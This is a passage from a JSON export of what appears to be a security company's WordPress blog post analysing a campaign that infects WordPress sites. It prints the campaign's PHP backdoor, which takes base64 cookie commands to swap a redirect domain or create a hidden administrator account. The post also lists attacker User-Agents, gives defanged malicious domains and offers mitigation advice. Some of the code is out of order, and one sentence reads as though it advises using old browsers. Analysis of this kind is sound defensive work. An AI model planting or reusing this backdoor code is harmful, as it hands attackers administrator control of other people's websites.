has-background has-link-color wp-elements-a75af9397c92626d146438d48062e652\" style=\"background-color:#310549\">function _gcookie($z2){<br>}<br>return(isset($_COOKIE [$z2]))?base64_decode($_COOKIE [$z2]):'';<br>if(!empty($d0)&amp;&amp;_gcookie('pw')===$d0){<br>switch(_gcookie('c')){<br>case 'sd':<br>$e3=_gcookie('d');<br>if (strpos($e3,'.')&gt;0){<br>update_option('d', $e3);<br>}<br>break;<br>case 'au':<br>$e4=_gcookie('u');<br>$15=_gcookie('p');<br>$p6=_gcookie('e');<br>if($e4&amp;&amp;$15&amp;&amp;$p6&amp;&amp;!username_exists($e4)){<br>$w7=wp_create_user($e4, $15, $p6);<br>$x8=new WP_User($w7);<br>$x8-&gt;set_role('administrator');<br>}<br>break;<br>}<br>return;<br>}<\/pre>\n\n\n\n<p>have a look on the Crucial Functions of this Backdoor at this point:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Dynamic Domain Update (sd): Seamlessly updates the primary DNS TDS domain and securely stores it in WordPress. A single discreet GET request can swap out the domain, ensuring easy concealment.<\/li>\n\n\n\n<li>Admin User Creation (au): Allows the unauthorized creation of a malicious WordPress admin user, compromising website security. These functionalities pose a severe threat to website integrity. Take proactive steps to protect your online assets.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Persistence_of_Malware\"><\/span>Persistence of Malware <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Did you know? A recent malware campaign is wreaking havoc by installing the WPCode plugin onto unsuspecting websites. This plugin serves as a gateway for cyber attackers to inject their own custom JS and PHP code, compromising site security.<\/p>\n\n\n\n<p>Our analysis, based on logs from various affected sites, reveals a troubling pattern. While it remains uncertain which vulnerability initially allowed this malware to infiltrate, our investigation pinpointed its activity to the moment attackers gain access to WordPress and install the WPCode plugin using valid admin credentials.<\/p>\n\n\n\n<p>What&#8217;s truly alarming is the meticulous effort these attackers put in to ensure their malware remains undetected. After infecting a site, their bots diligently revisit it daily, sometimes even multiple times a day, to log into WordPress and verify the WPCode plugin&#8217;s activation status. In a remarkable display of persistence, we observed an instance where a site owner deactivated the plugin, only to have it reactivated by the attacker&#8217;s bot a mere two hours later!<\/p>\n\n\n\n<p>Furthermore, our research uncovers another tactic employed by these malicious actors. They&#8217;re also experimenting with a similar plugin called &#8216;Head, Footer and Post Injections,&#8217; using it as a backup plan. While this plugin serves the same purpose of allowing custom JS and PHP injections, it&#8217;s yet to become the primary tool in their arsenal.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"User-Agents_and_Proxies\"><\/span>User-Agents and Proxies <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Discovering the origins of harmful bot requests reveals a diverse network of residential IPs spanning the globe, such as: <\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Mexico<\/li>\n\n\n\n<li>Pakistan<\/li>\n\n\n\n<li>Brazil<\/li>\n\n\n\n<li>Egypt<\/li>\n\n\n\n<li>Thailand<\/li>\n\n\n\n<li>Kenya<\/li>\n\n\n\n<li>Morocco <\/li>\n\n\n\n<li>Serbia<\/li>\n\n\n\n<li>etc.<\/li>\n<\/ul>\n\n\n\n<p>These requests likely stem from compromised computers or public proxies, highlighting the widespread impact of cyber threats worldwide.<\/p>\n\n\n\n<p>The User-Agent strings of all these requests differ very much, but you should typically use the older versions of browsers:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-2e087a63cb38ab2b87d1d02fa9327ac4\" style=\"background-color:#310549\">\"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2228.0 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/54.0.2840.99 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/55.0.2883.87 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/58.0.3029.110 Safari\/537.3\"\n\"Mozlila\/5.0 (Linux; Android 7.0; SM-G892A Bulid\/NRD90M; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/60.0.3112.107 Moblie Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.87 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/72.0.3626.121 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/72.0.2265.141 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/78.0.3904.97 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.125 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 6.1; ) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/83.0.4103.116 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/85.0.4183.121 Safari\/537.36 Edg\/85.0.564.70\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/87.0.4280.67 Safari\/537.36 Edg\/87.0.664.52\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/88.0.4324.182 Safari\/537.36 Edg\/88.0.705.74\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/89.0.4389.114 Safari\/537.36 Edg\/89.0.774.68\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.85 Safari\/537.36\"\n\"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\/20100101 Firefox\/62.0\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko\/20100101 Firefox\/79.0\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\/20100101 Firefox\/94.0\"\n\"Mozilla\/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko\/20100101 Firefox\/95.0\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko\/20100101 Firefox\/85.0\"\n\"Mozilla\/5.0 (Windows NT 6.3; WOW64; Trident\/7.0; rv:11.0) like Gecko\"<\/pre>\n\n\n\n<p>In online sessions, it&#8217;s common for your device&#8217;s identification (User-Agent) and internet location (IP address) to switch. For example, you might log in with one IP address and see another IP address accessing your \/wp-admin\/ URLs soon after, using a different User-Agent. This behavior often indicates the use of a proxy, which masks the original IP address. Understanding this can help you ensure the security of your online activities.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Steps_Of_Mitigation\"><\/span>Steps Of Mitigation<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Protect your website from cyber threats by taking proactive measures. Web hosts play a crucial role in safeguarding against malicious activities. By sinkholing domain names linked to suspicious activities, like DNS DTS, and blocking their associated name servers, such as cloud-stats[.]com, ns1.cloud-stats[.]com, and ns2.cloud-stats[.]com, the risks can be significantly reduced.<\/p>\n\n\n\n<p>As a website owner, here&#8217;s what you can do to fortify your site:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Strengthen your WordPress admin passwords with unique and robust credentials for each account.<\/li>\n\n\n\n<li>Regularly check for unfamiliar WordPress users and remove them promptly through the WordPress dashboard or database inspection.<\/li>\n\n\n\n<li>If you&#8217;re using the WPCode plugin, thoroughly examine all installed code snippets and delete any that seem suspicious or unnecessary.<\/li>\n\n\n\n<li>Audit all installed plugins to ensure they are legitimate. Some plugins may hide in directories like insert-headers-and-footers\/ and header-footer\/. Remove any plugins that don&#8217;t belong.<\/li>\n\n\n\n<li>Keep all plugins and themes updated to the latest versions to patch known vulnerabilities. If updates aren&#8217;t possible immediately, consider employing a web application firewall for virtual patching.<\/li>\n<\/ul>\n\n\n\n<p>By following these steps, you can bolster your website&#8217;s defenses and keep it safe from potential threats. Stay vigilant and proactive to maintain a secure online presence.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span>Conclusion<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Having trouble with your website? Talk to us now! Our skilled security team at ElySpace is available 24\/7 to handle malware problems, clean up your site, and fix it. Contact us anytime for quick help and to get your website working again!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>JavaScript Malware Tactics: There&#8217;s a new harmful campaign attacking WordPress sites. It added dangerous JavaScript code to these sites, which then sent visitors to harmful VexTrio domains. What&#8217;s interesting about this malware is that it used dynamic DNS TXT records from the tracker-cloud[.]com domain to get new redirect URLs. Since then, we&#8217;ve observed how the [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":378,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"two_page_speed":[],"footnotes":""},"categories":[14,20,3],"tags":[],"class_list":["post-351","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","category-domain-name","category-wordpress"],"acf":[],"_links":{"self":[{"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/posts\/351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/comments?post=351"}],"version-history":[{"count":4,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/posts\/351\/revisions"}],"predecessor-version":[{"id":979,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/posts\/351\/revisions\/979"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/media\/378"}],"wp:attachment":[{"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/media?parent=351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/categories?post=351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/elyspace.com\/blog\/wp-json\/wp\/v2\/tags?post=351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}